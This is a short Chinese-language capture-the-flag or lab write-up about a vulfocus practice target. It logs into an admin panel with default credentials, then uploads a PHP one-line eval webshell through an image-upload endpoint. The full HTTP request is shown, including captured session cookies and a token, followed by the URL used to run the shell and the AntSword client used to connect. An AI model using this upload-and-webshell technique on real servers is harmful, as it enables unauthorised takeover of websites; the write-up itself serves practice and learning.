漏洞环境搭建:vulfocus
发现这个页面后,通过访问IP:Port/admin.php,登录后台
通过默认用户名密码admin:admin进行登录
登录后台后,主要思路就是找到网站的文件上传点,然后去上传一句话木马,或者找到命令执行的地方去拿到网站服务器的shell。
最后在”系统设置->版本管理->添加“处找到图片上传点,直接burp抓包当前页面,然后上传文件请求包,请求包内容如下
POST //admin.php/common/add_images.html HTTP/1.1
Host: 47.109.191.51:10001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------326774743432415414462475084350
Content-Length: 269
Origin: http://47.109.191.51:10001
Connection: close
Referer: http://47.109.191.51:10001/admin.php/edition/add.html
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1636957776,1637035618,1637078936,1637219652; Hm_lvt_b5514a35664fd4ac6a893a1e56956c97=1636704940,1636709021,1636825689,1637222671; _ga=GA1.2.744261971.1636781886; Hm_lpvt_deaeca6802357287fb453f342ce28dda=1637221849; vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjo0ODQ1LCJ1c2VybmFtZSI6IllvdXRoQmVsaWVmIiwiZXhwIjoxNjM3MzA2MDA0LCJlbWFpbCI6IjI0NTU1NjQ2NEBxcS5jb20ifQ.4Gr7Mkd6jMvSpaNITDQoww0jUnSP1d59O34IpzyDpmI; PHPSESSID=7jrca24napuo1umgs5s58dfhvu; _gid=GA1.2.277758474.1637219810; ktqnjecmsdodbdata=empirecms; ktqnjeloginlic=empirecmslic; ktqnjloginadminstyleid=1; ktqnjlogintime=1637222551; ktqnjtruelogintime=1637222430; ktqnjloginuserid=1; ktqnjloginusername=admin; ktqnjloginrnd=5I62uWWbyxT9vB9Fi6FU; ktqnjloginlevel=1; ktqnjloginecmsckpass=35f1e6e02526a8193d735f89d9093f80; ktqnjloginecmsckfrnd=gkgk52G7rpQ6xWOHlfLWxgdFpG9; ktqnjloginecmsckfdef=N0VHyuu3ljnoPVbceYkXaX; ktqnjemecOYNqOjnu=BXWggMbbslguQiExvN; Hm_lpvt_b5514a35664fd4ac6a893a1e56956c97=1637222890; thinkphp_show_page_trace=0|0; eth0_time=1637226896; eth0_num=0; eth0=249.118; login_auto=YXs3g0Y%3D%7C0e2c7f3efd15db77ba3f2ec9ab35f8347cb5be0d
Upgrade-Insecure-Requests: 1-----------------------------326774743432415414462475084350
Content-Disposition: form-data; name="file"; filename="webshell.php"
Content-Type: application/octet-stream<?php eval($_REQUEST[1]); ?>
-----------------------------326774743432415414462475084350--
上传成功
然后访问:http://47.109.191.51:10001/public\/edit\/20240411\/8817b191ad1f76ad48908b33832e0b5b.php?1=phpinfo();
既然访问成功,那么直接使用蚁剑连接。
